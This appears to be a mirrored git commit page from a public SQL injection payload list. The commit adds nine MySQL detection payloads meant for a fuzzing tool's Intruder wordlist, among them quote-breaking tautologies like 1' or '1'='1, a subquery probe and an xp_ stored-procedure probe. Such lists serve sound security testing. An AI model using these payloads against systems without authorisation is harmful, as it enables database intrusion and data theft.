mirror of
https://github.com/payloadbox/sql-injection-payload-list.git
synced 2025-12-29 16:15:05 +00:00
Intruder Payloads
Add Intruder Payloads
This commit is contained in:
9
Intruder/detect/MySQL/MySQL.txt
Normal file
9
Intruder/detect/MySQL/MySQL.txt
Normal file
@@ -0,0 +1,9 @@
|
||||
1'1
|
||||
1 exec sp_ (or exec xp_)
|
||||
1 and 1=1
|
||||
1' and 1=(select count(*) from tablenames); --
|
||||
1 or 1=1
|
||||
1' or '1'='1
|
||||
1or1=1
|
||||
1'or'1'='1
|
||||
fake@ema'or'il.nl'='il.nl
|
||||
Reference in New Issue
Block a user